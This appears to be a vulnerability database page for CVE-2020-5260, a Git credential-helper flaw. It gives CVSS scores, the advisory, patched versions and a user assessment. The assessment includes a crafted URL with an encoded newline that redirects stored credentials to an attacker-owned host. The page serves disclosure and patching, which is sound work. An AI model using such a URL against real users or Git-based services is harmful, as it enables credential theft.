Lucene search

K
attackerkbAttackerKBAKB:A262C213-4D35-4C7D-A07F-975EC8C68878
HistoryApr 14, 2020 - 12:00 a.m.

CVE-2020-5260

2020-04-1400:00:00
attackerkb.com
32

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

Affected versions of Git have a vulnerability whereby Git can be tricked into sending private credentials to a host controlled by an attacker. Git uses external “credential helper” programs to store and retrieve passwords or other credentials from secure storage provided by the operating system. Specially-crafted URLs that contain an encoded newline can inject unintended values into the credential helper protocol stream, causing the credential helper to retrieve the password for one server (e.g., good.example.com) for an HTTP request being made to another server (e.g., evil.example.com), resulting in credentials for the former being sent to the latter. There are no restrictions on the relationship between the two, meaning that an attacker can craft a URL that will present stored credentials for any host to a host of their choosing. The vulnerability can be triggered by feeding a malicious URL to git clone. However, the affected URLs look rather suspicious; the likely vector would be through systems which automatically clone URLs not visible to the user, such as Git submodules, or package systems built around Git. The problem has been patched in the versions published on April 14th, 2020, going back to v2.17.x. Anyone wishing to backport the change further can do so by applying commit 9a6bbee (the full release includes extra checks for git fsck, but that commit is sufficient to protect clients against the vulnerability). The patched versions are: 2.17.4, 2.18.3, 2.19.4, 2.20.3, 2.21.2, 2.22.3, 2.23.2, 2.24.2, 2.25.3, 2.26.1.

Recent assessments:

Green-m at April 17, 2020 4:37am UTC reported:

The exploitability is very easy

This vuln is just a CRLF injection in my opinion.

You could offer the URL like https://one.example.com?%0ahost=two.example.com/ so that the credential would be sent to two.example.com which the attacker owns.

The value is limited

I guess there are some prerequisites for attack :

  • A subdomain name, has the same main domain name as the target.

  • The victim store or caches the credentials (It’s not the default behavior).

  • May need user interactions. The exploit usually occurred when the user runs git clone <URL>.

That’s why I prefer the value for the attacker is low.

Another interesting scenario

This vuln probably affected the App and service based on git, like GitLab(Not include GitLab).

These services may allow users to import or remote clone some repo, this vuln would occur.

Original patch

<https://github.com/git/git/commit/9a6bbee8006c24b46a85d29e7b38cfa79e9ab21b&gt;

Fix and walkaround

See <https://github.com/git/git/security/advisories/GHSA-qm7j-c969-7j4q&gt;

Been my first comment in this awesome attackerkb community, welcome to discuss and helpful advice.

Assessed Attacker Value: 2
Assessed Attacker Value: 2Assessed Attacker Value: 4

References

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N